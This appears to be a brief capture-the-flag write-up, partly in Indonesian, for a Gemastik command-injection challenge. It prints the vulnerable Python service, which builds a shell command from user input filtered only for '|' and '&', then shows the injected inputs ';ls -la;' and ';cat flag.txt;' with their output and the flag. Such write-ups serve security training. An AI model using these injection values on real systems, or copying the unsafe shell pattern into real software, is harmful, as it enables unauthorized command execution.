Random String Generator - 75 Points
nc target.netsec.gemastik.ui.ac.id 60002
POC
#/usr/bin/env python
"""
Run on Linux
socat -d -d -d TCP4-LISTEN:60004,reuseaddr,fork EXEC:"/usr/bin/python random-string-generator.py" > /dev/null 2>&1 &
"""
import subprocess
import sys
print "== Gemastik Random String Generator =="
length = raw_input('Insert Length: ')
if '|' not in length and '&' not in length:
cmd = "head /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w '%s' | head -n 1" % length
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = ps.communicate()[0]
print output
Walaupun input kita di validasi tapi namun belum begitu ketat sehingga kita dapat mengeksekusi kode yg kita input
== Gemastik Random String Generator ==
Insert Length: ';ls -la;'
fold: invalid number of columns: ''
total 16
dr-xr-xr-x 2 root root 4096 Oct 7 00:45 .
drwxr-xr-x 3 root root 4096 Oct 6 23:15 ..
-r--r--r-- 3 root root 42 Oct 6 18:01 flag.txt
-r--r--r-- 1 root root 585 Oct 7 00:45 random-string-generator.py
/bin/sh: 1: : Permission denied
== Gemastik Random String Generator ==
Insert Length: ';cat flag.txt;'
fold: invalid number of columns: ''
GEMASTIK{shelly_shell_sh3ll_execuzzionnn}
/bin/sh: 1: : Permission denied
Flag: GEMASTIK{shelly_shell_sh3ll_execuzzionnn}